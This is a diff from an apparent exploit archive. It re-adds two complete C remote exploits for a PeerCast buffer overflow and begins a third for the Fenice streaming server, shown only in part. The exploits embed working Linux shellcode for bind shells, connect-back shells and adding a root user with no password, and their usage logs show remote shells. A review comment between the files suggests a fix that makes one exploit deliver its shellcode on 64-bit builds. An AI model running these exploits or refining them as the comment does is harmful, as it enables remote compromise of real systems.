+++ b/platforms/linux/remote/1574.c
@@ -1,281 +1,281 @@ -/* GNU PeerCast <= v0.1216 Remote Exploit - * ====================================== - * PeerCast is a simple, free way to listen to radio and watch video on the internet. A - * remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which - * can be potentially exploited to execute arbitrary code due to insufficient bounds - * checking on a memory copy operation occuring on the stack. All versions upto and - * prior to v0.1216 are believed to be vulnerable. Return address does a "jmp esp" which - * references the start of our shellcode and as such will work on multiple distributions - * and VA randomized hosts. - * - * Example. - * matthew@localhost ~/code/exploits $ ./prdelka-vs-GNU-peercast -s 123.123.123.123 -c 0 -t 1 -x 31337 - * [ GNU PeerCast <= v0.1216 remote exploit - * [ Using shellcode 'Linux bind() shellcode (4444/tcp default)' (84 bytes) - * [ Using target '(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)' - * [ Connected to 123.123.123.123 (7144/tcp) - * [ Sent 883 bytes to target - * matthew@localhost ~/code/exploits $ nc 123.123.123.123 31337 - * id - * uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) - * - * -prdelka - */ -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -struct target { - char* name; - int retaddr; -}; - -struct shellcode { - char* name; - int port; - int host; - char* shellcode; -}; - -const int targetno = 2; - -struct target targets[] = { - {"(GNU peercast v0.1212) 2.4.28-gentoo-r8 (Gentoo Linux 3.3.5-r1)",0x080918AF}, - {"(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)",0x080918AF} -}; - -const int shellno = 3; - -struct shellcode shellcodes[] = { - {"Linux bind() shellcode (4444/tcp default)",20,-1, - "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" - "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" - 
"\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" - "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" - "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" - "\x89\xe1\xcd\x80"}, - {"Linux connect() shellcode (4444/tcp default)",32,26, - "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" - "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x01\x02\x03\x04\x66\x68" - "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" - "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" - "\x89\xe1\xb0\x0b\xcd\x80"}, - {"Linux add user 'syscfg' with {null} password and UID 0",-1,-1, - "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65" - "\x74\x63\x89\xE6\x31\xD2\x31\xC9\xB1\x01\x89\xF3\x31\xC0\xB0\x05" - "\xCD\x80\x50\x89\xE6\x31\xC0\xB0\x13\x8B\x1E\x31\xC9\x31\xD2\xB2" - "\x02\xCD\x80\x31\xC0\xB0\x04\x8B\x1E\x31\xC9\x51\x68\x61\x73\x68" - "\x0A\x68\x69\x6E\x2F\x62\x68\x74\x3A\x2F\x62\x68\x2F\x72\x6F\x6F" - "\x68\x63\x66\x67\x3A\x68\x66\x6F\x72\x20\x68\x73\x65\x72\x20\x68" - "\x65\x6D\x20\x75\x68\x73\x79\x73\x74\x68\x30\x3A\x30\x3A\x68\x66" - "\x67\x3A\x3A\x68\x73\x79\x73\x63\x89\xE1\x31\xD2\xB2\x30\xCD\x80" - "\x31\xC0\xB0\x06\x8B\x1E\xCD\x80"} -}; - -void dummyhandler(){ -} - -int main (int argc, char *argv[]) { - int sd, rc, i, c, ret, payg, paya, payb, eip, ishell = 0, port = 7144, ihost = 0, itarg = 0; - int count, offset, ioffset, index = 0; - short shellport; - char *host, *buffer, *buffer2, *payload; - struct sockaddr_in localAddr, servAddr; - struct hostent *h, *rv; - static struct option options[] = { - {"server", 1, 0, 's'}, - {"port", 1, 0, 'p'}, - {"target", 1, 0, 't'}, - {"shellcode", 1, 0, 'c'}, - {"shellport", 1, 0, 'x'}, - {"shellhost", 1, 0, 'i'}, - {"help", 0, 0,'h'} - }; - printf("[ GNU PeerCast <= v0.1216 remote exploit\n"); - while(c != -1) - { - c = getopt_long(argc,argv,"s:p:t:c:x:i:h",options,&index); - switch(c) { - case -1: - break; - case 's': - 
if(ihost==0){ - h = gethostbyname(optarg); - if(h==NULL){ - printf("[ Error unknown host '%s'\n",optarg); - exit(1); - } - host = malloc(strlen(optarg) + 1); - sprintf(host,"%s",optarg); - ihost = 1; - } - break; - case 'p': - port = atoi(optarg); - break; - case 'c': - if(ishell==0) - { - payg = atoi(optarg); - switch(payg){ - case 0: - printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); - payload = malloc(strlen(shellcodes[payg].shellcode)+1); - memset(payload,0,strlen(shellcodes[payg].shellcode)+1); - memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); - ishell = 1; - break; - case 1: - printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); - payload = malloc(strlen(shellcodes[payg].shellcode)+1); - memset(payload,0,strlen(shellcodes[payg].shellcode)+1); - memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); - ishell = 1; - break; - case 2: - printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); - payload = malloc(strlen(shellcodes[payg].shellcode)+1); - memset(payload,0,strlen(shellcodes[payg].shellcode)+1); - memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); - ishell = 1; - break; - default: - printf("[ Invalid shellcode selection %d\n",payg); - exit(0); - break; - } - } - break; - case 'x': - if(ishell==1) - { - if(shellcodes[payg].port > -1) - { - paya = strlen(payload); - shellport = atoi(optarg); - shellport =(shellport&0xff)<<8 | shellport>>8; - memcpy(&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); - if(paya > strlen(payload)) - { - printf("[ Shellcode port introduces null bytes\n"); - exit(1); - } - } - else{ - printf("[ (%s) port selection is ignored for current shellcode\n",optarg); - } - } - else{ - printf("[ No shellcode selected yet, ignoring (%s) port 
selection\n",optarg); - break; - } - break; - case 'i': - if(ishell==1) - { - if(shellcodes[payg].host > -1) - { - paya = strlen(payload); - rv = gethostbyname(optarg); - if(h==NULL){ - printf("[ Error unknown host '%s'\n",optarg); - exit(1); - } - memcpy(&payload[shellcodes[payg].host],rv->h_addr_list[0], rv->h_length); - if(paya > strlen(payload)) - { - printf("[ Shellhost introduces null bytes\n"); - exit(1); - } - } - else{ - printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg); - } - } - else{ - printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg); - } - break; - case 't': - if(itarg==0){ - ret = atoi(optarg); - switch(ret){ - case 0: - printf("[ Using target '%s'\n",targets[ret].name); - eip = targets[ret].retaddr; - break; - case 1: - printf("[ Using target '%s'\n",targets[ret].name); - eip = targets[ret].retaddr; - break; - default: - eip = strtoul(optarg,NULL,16); - printf("[ Using return address '0x%x'\n",eip); - break; - } - itarg = 1; - } - break; - case 'h': - printf("[ Usage instructions.\n[\n"); - printf("[ %s (optional)\n[\n[ --server|-s \n",argv[0]); - printf("[ --port|-p (port)[default 7144]\n[ --shellcode|-c \n"); - printf("[ --shellport|-x (port)\n"); - printf("[ --shellhost|-i (ip/hostname)\n"); - printf("[ --target|-t \n[\n"); - printf("[ Target#'s\n"); - for(count = 0;count <= targetno - 1;count++){ - printf("[ %d %s 0x%x\n",count,targets[count],targets[count]); - } - printf("[\n[ Shellcode#'s\n"); - for(count = 0;count <= shellno - 1;count++){ - printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); - } - exit(0); - break; - default: - break; - } - } - if(itarg != 1 || ihost != 1 || ishell != 1){ - printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); - exit(1); - } - signal(SIGPIPE,dummyhandler); - servAddr.sin_family = h->h_addrtype; - memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); 
- servAddr.sin_port = htons(port); - sd = socket(AF_INET, SOCK_STREAM, 0); - if(sd<0) { - printf("[ Cannot open socket\n"); - exit(1); - } - rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); - if(rc<0) { - printf("[ Cannot connect\n"); - exit(1); - } - printf("[ Connected to %s (%d/tcp)\n",host,port); - buffer = malloc(2048 + strlen(payload) + sizeof(eip)); - memset(buffer,0,2048 + strlen(payload) + sizeof(eip)); - strcpy(buffer,"GET /stream/?"); - for(count = 0;count <= 779;count++){ - strcat(buffer,"A"); - } - buffer2 = (char*)((int)buffer + (int)strlen(buffer)); - memcpy((void*)buffer2,(void*)&eip,sizeof(eip)); - buffer2 = (char*)((int)buffer2 + sizeof(eip)); - memcpy((void*)buffer2,(void*)payload,strlen(payload)); - strcat(buffer2,"\r\n"); - rc = send(sd,buffer,strlen(buffer),0); - printf("[ Sent %d bytes to target\n",rc); -} - -// milw0rm.com [2006-03-11] +/* GNU PeerCast <= v0.1216 Remote Exploit + * ====================================== + * PeerCast is a simple, free way to listen to radio and watch video on the internet. A + * remotely exploitable buffer overflow has been identified by INFIGO-2006-03-01 which + * can be potentially exploited to execute arbitrary code due to insufficient bounds + * checking on a memory copy operation occuring on the stack. All versions upto and + * prior to v0.1216 are believed to be vulnerable. Return address does a "jmp esp" which + * references the start of our shellcode and as such will work on multiple distributions + * and VA randomized hosts. + * + * Example. 
+ * matthew@localhost ~/code/exploits $ ./prdelka-vs-GNU-peercast -s 123.123.123.123 -c 0 -t 1 -x 31337 + * [ GNU PeerCast <= v0.1216 remote exploit + * [ Using shellcode 'Linux bind() shellcode (4444/tcp default)' (84 bytes) + * [ Using target '(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)' + * [ Connected to 123.123.123.123 (7144/tcp) + * [ Sent 883 bytes to target + * matthew@localhost ~/code/exploits $ nc 123.123.123.123 31337 + * id + * uid=65534(nobody) gid=65534(nobody) groups=65534(nobody) + * + * -prdelka + */ +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +struct target { + char* name; + int retaddr; +}; + +struct shellcode { + char* name; + int port; + int host; + char* shellcode; +}; + +const int targetno = 2; + +struct target targets[] = { + {"(GNU peercast v0.1212) 2.4.28-gentoo-r8 (Gentoo Linux 3.3.5-r1)",0x080918AF}, + {"(GNU peercast v0.1212) 2.6.14-gentoo-r2 (Gentoo 3.3.5.20050130-r1)",0x080918AF} +}; + +const int shellno = 3; + +struct shellcode shellcodes[] = { + {"Linux bind() shellcode (4444/tcp default)",20,-1, + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96" + "\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56" + "\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1" + "\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0" + "\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xcd\x80"}, + {"Linux connect() shellcode (4444/tcp default)",32,26, + "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59" + "\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x01\x02\x03\x04\x66\x68" + "\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd" + "\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53" + "\x89\xe1\xb0\x0b\xcd\x80"}, + {"Linux add user 'syscfg' with {null} password and UID 0",-1,-1, + "\x31\xC0\x50\x68\x73\x73\x77\x64\x68\x2F\x2F\x70\x61\x68\x2F\x65" + 
"\x74\x63\x89\xE6\x31\xD2\x31\xC9\xB1\x01\x89\xF3\x31\xC0\xB0\x05" + "\xCD\x80\x50\x89\xE6\x31\xC0\xB0\x13\x8B\x1E\x31\xC9\x31\xD2\xB2" + "\x02\xCD\x80\x31\xC0\xB0\x04\x8B\x1E\x31\xC9\x51\x68\x61\x73\x68" + "\x0A\x68\x69\x6E\x2F\x62\x68\x74\x3A\x2F\x62\x68\x2F\x72\x6F\x6F" + "\x68\x63\x66\x67\x3A\x68\x66\x6F\x72\x20\x68\x73\x65\x72\x20\x68" + "\x65\x6D\x20\x75\x68\x73\x79\x73\x74\x68\x30\x3A\x30\x3A\x68\x66" + "\x67\x3A\x3A\x68\x73\x79\x73\x63\x89\xE1\x31\xD2\xB2\x30\xCD\x80" + "\x31\xC0\xB0\x06\x8B\x1E\xCD\x80"} +}; + +void dummyhandler(){ +} + +int main (int argc, char *argv[]) { + int sd, rc, i, c, ret, payg, paya, payb, eip, ishell = 0, port = 7144, ihost = 0, itarg = 0; + int count, offset, ioffset, index = 0; + short shellport; + char *host, *buffer, *buffer2, *payload; + struct sockaddr_in localAddr, servAddr; + struct hostent *h, *rv; + static struct option options[] = { + {"server", 1, 0, 's'}, + {"port", 1, 0, 'p'}, + {"target", 1, 0, 't'}, + {"shellcode", 1, 0, 'c'}, + {"shellport", 1, 0, 'x'}, + {"shellhost", 1, 0, 'i'}, + {"help", 0, 0,'h'} + }; + printf("[ GNU PeerCast <= v0.1216 remote exploit\n"); + while(c != -1) + { + c = getopt_long(argc,argv,"s:p:t:c:x:i:h",options,&index); + switch(c) { + case -1: + break; + case 's': + if(ihost==0){ + h = gethostbyname(optarg); + if(h==NULL){ + printf("[ Error unknown host '%s'\n",optarg); + exit(1); + } + host = malloc(strlen(optarg) + 1); + sprintf(host,"%s",optarg); + ihost = 1; + } + break; + case 'p': + port = atoi(optarg); + break; + case 'c': + if(ishell==0) + { + payg = atoi(optarg); + switch(payg){ + case 0: + printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); + payload = malloc(strlen(shellcodes[payg].shellcode)+1); + memset(payload,0,strlen(shellcodes[payg].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); + ishell = 1; + break; + case 1: + printf("[ Using shellcode '%s' (%d 
bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); + payload = malloc(strlen(shellcodes[payg].shellcode)+1); + memset(payload,0,strlen(shellcodes[payg].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); + ishell = 1; + break; + case 2: + printf("[ Using shellcode '%s' (%d bytes)\n",shellcodes[payg].name,strlen(shellcodes[payg].shellcode)); + payload = malloc(strlen(shellcodes[payg].shellcode)+1); + memset(payload,0,strlen(shellcodes[payg].shellcode)+1); + memcpy((void*)payload,(void*)shellcodes[payg].shellcode,strlen(shellcodes[payg].shellcode)); + ishell = 1; + break; + default: + printf("[ Invalid shellcode selection %d\n",payg); + exit(0); + break; + } + } + break; + case 'x': + if(ishell==1) + { + if(shellcodes[payg].port > -1) + { + paya = strlen(payload); + shellport = atoi(optarg); + shellport =(shellport&0xff)<<8 | shellport>>8; + memcpy(&payload[shellcodes[payg].port],&shellport,sizeof(shellport)); + if(paya > strlen(payload)) + { + printf("[ Shellcode port introduces null bytes\n"); + exit(1); + } + } + else{ + printf("[ (%s) port selection is ignored for current shellcode\n",optarg); + } + } + else{ + printf("[ No shellcode selected yet, ignoring (%s) port selection\n",optarg); + break; + } + break; + case 'i': + if(ishell==1) + { + if(shellcodes[payg].host > -1) + { + paya = strlen(payload); + rv = gethostbyname(optarg); + if(h==NULL){ + printf("[ Error unknown host '%s'\n",optarg); + exit(1); + } + memcpy(&payload[shellcodes[payg].host],rv->h_addr_list[0], rv->h_length); + if(paya > strlen(payload)) + { + printf("[ Shellhost introduces null bytes\n"); + exit(1); + } + } + else{ + printf("[ (%s) shellhost selection is ignored for current shellcode\n",optarg); + } + } + else{ + printf("[ No shellcode selected yet, ignoring (%s) shellhost selection\n",optarg); + } + break; + case 't': + if(itarg==0){ + ret = atoi(optarg); + switch(ret){ + case 0: + printf("[ Using target 
'%s'\n",targets[ret].name); + eip = targets[ret].retaddr; + break; + case 1: + printf("[ Using target '%s'\n",targets[ret].name); + eip = targets[ret].retaddr; + break; + default: + eip = strtoul(optarg,NULL,16); + printf("[ Using return address '0x%x'\n",eip); + break; + } + itarg = 1; + } + break; + case 'h': + printf("[ Usage instructions.\n[\n"); + printf("[ %s (optional)\n[\n[ --server|-s \n",argv[0]); + printf("[ --port|-p (port)[default 7144]\n[ --shellcode|-c \n"); + printf("[ --shellport|-x (port)\n"); + printf("[ --shellhost|-i (ip/hostname)\n"); + printf("[ --target|-t \n[\n"); + printf("[ Target#'s\n"); + for(count = 0;count <= targetno - 1;count++){ + printf("[ %d %s 0x%x\n",count,targets[count],targets[count]); + } + printf("[\n[ Shellcode#'s\n"); + for(count = 0;count <= shellno - 1;count++){ + printf("[ %d \"%s\" (length %d bytes)\n",count,shellcodes[count].name,strlen(shellcodes[count].shellcode)); + } + exit(0); + break; + default: + break; + } + } + if(itarg != 1 || ihost != 1 || ishell != 1){ + printf("[ Error insufficient arguements, try running '%s --help'\n",argv[0]); + exit(1); + } + signal(SIGPIPE,dummyhandler); + servAddr.sin_family = h->h_addrtype; + memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); + servAddr.sin_port = htons(port); + sd = socket(AF_INET, SOCK_STREAM, 0); + if(sd<0) { + printf("[ Cannot open socket\n"); + exit(1); + } + rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); + if(rc<0) { + printf("[ Cannot connect\n"); + exit(1); + } + printf("[ Connected to %s (%d/tcp)\n",host,port); + buffer = malloc(2048 + strlen(payload) + sizeof(eip)); + memset(buffer,0,2048 + strlen(payload) + sizeof(eip)); + strcpy(buffer,"GET /stream/?"); + for(count = 0;count <= 779;count++){ + strcat(buffer,"A"); + } + buffer2 = (char*)((int)buffer + (int)strlen(buffer)); + memcpy((void*)buffer2,(void*)&eip,sizeof(eip)); + buffer2 = (char*)((int)buffer2 + sizeof(eip)); + 
memcpy((void*)buffer2,(void*)payload,strlen(payload));
+ strcat(buffer2,"\r\n");
+ rc = send(sd,buffer,strlen(buffer),0);
+ printf("[ Sent %d bytes to target\n",rc);
+}
+
+// milw0rm.com [2006-03-11]
diff --git a/platforms/linux/remote/1578.c b/platforms/linux/remote/1578.c
index a47321e48..4b8d7bbbc 100755
--- a/platforms/linux/remote/1578.c
+++ b/platforms/linux/remote/1578.c
@@ -1,134 +1,134 @@ -/* -\ PeerCast <=0.1216 remote exploit -/ by Darkeagle -\ -/ 09.03.06 -\ -/ -\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz. -/ -\ -/ http://unl0ck.net - -******************************************* -root@localhost darkeagle]# telnet localhost 36864 -Trying 127.0.0.1... -Connected to localhost (127.0.0.1). -Escape character is '^]'. -id; -uid=0(root) gid=0(root) groups=0(root) -: command not found -uname -a; -Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux -: command not found -******************************************* - -Special tnx goes to: Dr_UF0 for targets support :) - -\ -/ -\ -*/ - -#include -#include -#include -#include -#include -#include -#include - - -char scode[]= // binds 4444 port -"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85" -"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5" -"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c" -"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c" -"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86" -"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7" -"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"; - -char linuxshellcode[]= // binds 36864 port - "\xeb\x6e\x5e\x29\xc0\x89\x46\x10" - "\x40\x89\xc3\x89\x46\x0c\x40\x89" - "\x46\x08\x8d\x4e\x08\xb0\x66\xcd" - "\x80\x43\xc6\x46\x10\x10\x88\x46" - "\x08\x31\xc0\x31\xd2\x89\x46\x18" - "\xb0\x90\x66\x89\x46\x16\x8d\x4e" - "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0" - "\x66\xcd\x80\x89\x5e\x0c\x43\x43" - "\xb0\x66\xcd\x80\x89\x56\x0c\x89" - "\x56\x10\xb0\x66\x43\xcd\x80\x86" - "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0" - "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd" - "\x80\x88\x56\x07\x89\x76\x0c\x87" - "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80" - "\xe8\x8d\xff\xff\xff\x2f\x62\x69" - "\x6e\x2f\x73\x68"; - - - -void usage(char *proga) -{ - printf("usage> %s \n", proga); -} - -int main( int argc, char 
*argv[] ) -{ -int sock; -struct sockaddr_in addr; -char evil[1024], get[1024]; - -long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz - - -system("clear"); -printf(".::: PeerCast <= 0.1215 remote exploit :::.\n"); -printf(" by Darkeagle \n\n"); -printf(" bug founder: Leon Juranic\n"); -printf("\n keep private!!!\n"); - -if ( argc < 3 ) -{ -usage(argv[0]); -exit(0); -} - -sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); - -addr.sin_family = AF_INET; -addr.sin_port = htons(atoi(argv[2])); -addr.sin_addr.s_addr = inet_addr(argv[1]); - -printf("\nexp> connecting...\n"); - -if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 ) -{ -printf("exp> connection failed\n"); -exit(0); -} - -printf("exp> connection enstabilished!\n"); - -memset(evil, 0x00, 1024); -memset(get, 0x00, 1024); -memset(evil, 0x55, 800); -//memcpy(evil+strlen(evil), &scode, sizeof(scode)); -memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode)); - -strcpy(get, "GET /stream/?"); - -*(long*)&evil[780] = retaddr; -strcat(evil, "\r\n\r\n"); -strcat(get, evil); - -sleep(1); -printf("exp> sending evil data\n"); -send(sock, get, strlen(get), 0); -printf("exp> done!\n"); -printf("exp> check shell\n"); -close(sock); -return 0; -} - -// milw0rm.com [2006-03-12] +/* +\ PeerCast <=0.1216 remote exploit +/ by Darkeagle +\ +/ 09.03.06 +\ +/ +\ gr33tz: bl4ck guys, unl0ck guys, rst/ghc guys, 0x557 guys, ph4nt0m guys, sh0k and many otherz. +/ +\ +/ http://unl0ck.net + +******************************************* +root@localhost darkeagle]# telnet localhost 36864 +Trying 127.0.0.1... +Connected to localhost (127.0.0.1). +Escape character is '^]'. 
+id; +uid=0(root) gid=0(root) groups=0(root) +: command not found +uname -a; +Linux localhost 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux +: command not found +******************************************* + +Special tnx goes to: Dr_UF0 for targets support :) + +\ +/ +\ +*/ + +#include +#include +#include +#include +#include +#include +#include + + +char scode[]= // binds 4444 port +"\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85" +"\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5" +"\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c" +"\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c" +"\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86" +"\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7" +"\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"; + +char linuxshellcode[]= // binds 36864 port + "\xeb\x6e\x5e\x29\xc0\x89\x46\x10" + "\x40\x89\xc3\x89\x46\x0c\x40\x89" + "\x46\x08\x8d\x4e\x08\xb0\x66\xcd" + "\x80\x43\xc6\x46\x10\x10\x88\x46" + "\x08\x31\xc0\x31\xd2\x89\x46\x18" + "\xb0\x90\x66\x89\x46\x16\x8d\x4e" + "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0" + "\x66\xcd\x80\x89\x5e\x0c\x43\x43" + "\xb0\x66\xcd\x80\x89\x56\x0c\x89" + "\x56\x10\xb0\x66\x43\xcd\x80\x86" + "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0" + "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd" + "\x80\x88\x56\x07\x89\x76\x0c\x87" + "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80" + "\xe8\x8d\xff\xff\xff\x2f\x62\x69" + "\x6e\x2f\x73\x68"; + + + +void usage(char *proga) +{ + printf("usage> %s \n", proga); +} + +int main( int argc, char *argv[] ) +{ +int sock; +struct sockaddr_in addr; +char evil[1024], get[1024]; + +long retaddr = 0x438a3e3c; // mandrake 10.0 rus - peercast 0.1211.tgz + + +system("clear"); +printf(".::: PeerCast <= 0.1215 remote exploit :::.\n"); +printf(" by Darkeagle \n\n"); +printf(" bug founder: Leon Juranic\n"); +printf("\n keep private!!!\n"); + +if ( argc < 3 ) +{ +usage(argv[0]); +exit(0); +} + +sock = 
socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(atoi(argv[2]));
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+
+printf("\nexp> connecting...\n");
+
+if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) != 0 )
+{
+printf("exp> connection failed\n");
+exit(0);
+}
+
+printf("exp> connection enstabilished!\n");
+
+memset(evil, 0x00, 1024);
+memset(get, 0x00, 1024);
+memset(evil, 0x55, 800);
+//memcpy(evil+strlen(evil), &scode, sizeof(scode));
+memcpy(evil+strlen(evil), &linuxshellcode, sizeof(linuxshellcode));
+
+strcpy(get, "GET /stream/?");
+
+*(long*)&evil[780] = retaddr;
+strcat(evil, "\r\n\r\n");
+strcat(get, evil);
+
+sleep(1);
+printf("exp> sending evil data\n");
+send(sock, get, strlen(get), 0);
+printf("exp> done!\n");
+printf("exp> check shell\n");
+close(sock);
+return 0;
+}
+
+// milw0rm.com [2006-03-12]
diff --git a/platforms/linux/remote/167.c b/platforms/linux/remote/167.c
index 709abdba3..fd8859690 100755
--- a/platforms/linux/remote/167.c
+++ b/platforms/linux/remote/167.c
@@ -303,6 +303,6 @@ int main(int argc,char *argv[]) {
 printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);
 printf("- Read source to know what to do to check if the exploit worked\n");
 return 0;
-}
-
-// milw0rm.com [2004-03-28]
+}
+
+// milw0rm.com [2004-03-28]
diff --git a/platforms/linux/remote/1717.c b/platforms/linux/remote/1717.c
index 9881ab02f..03e274615 100755
--- a/platforms/linux/remote/1717.c
+++ b/platforms/linux/remote/1717.c
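Review bot: The return-address store `*(long*)&evil[780] = retaddr;` (with `long retaddr`) assumes a 4-byte `long`; on an LP64 build it writes 8 bytes, so evil[784..787] become zero and the following `strcat(evil, "\r\n\r\n")`, `strcat(get, evil)` and `send(sock, get, strlen(get), 0)` all stop at that NUL, truncating the request before the shellcode at offset 800 is ever sent. Use a fixed-width value and a plain byte copy (the `(long*)` cast is also a strict-aliasing violation): `uint32_t ret32 = (uint32_t)retaddr; memcpy(&evil[780], &ret32, sizeof ret32);` — this needs `<stdint.h>`, which cannot be confirmed from the stripped `#include` lines. Separately, neither `socket()` nor `inet_addr()` is checked, so a failed socket or an unparsable host (INADDR_NONE) goes straight into `connect()` with only the generic "connection failed" message. The hunk re-adds the file unchanged (line-ending normalization), so these are pre-existing defects on the new side rather than something this commit introduces.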
@@ -1,275 +1,275 @@ -/* - IHS Iran Homeland Security public source code - Fenice - Open Media Streaming Server remote BOF exploit - author : c0d3r "kaveh razavi" c0d3r@ihsteam.com - package : fenice-1.10.tar.gz and prolly prior versions - workaround : update after patch release - advisory : http://www.securityfocus.com/bid/17678 - company address : http://streaming.polito.it/server - timeline : - 23 Apr 2006 : vulnerability reported by Luigi Auriemma - 25 Sep 2006 : IHS exploit released - exploit features : - 1) a global offset - 2) reliable metasploit shellcode - 3) autoconnect to shell - bad chars : 0x00 0x05 encoder : PexAlphaNum - compiled with gcc under Linux : gcc fenice.c -o fenice - - ************************************************************** - - Exploitation Method : linux-gate.so.1 - - the refrence written by izik could be downloaded from milw0rm. - after some research I realized that the offset is very stable - around 2.6 kernels compiled from source. the VA patch will - easily get bypassed. if you want to exploit 2.4 kernels - you can jump directly to the shellcode , there isn't any - stack randomization for 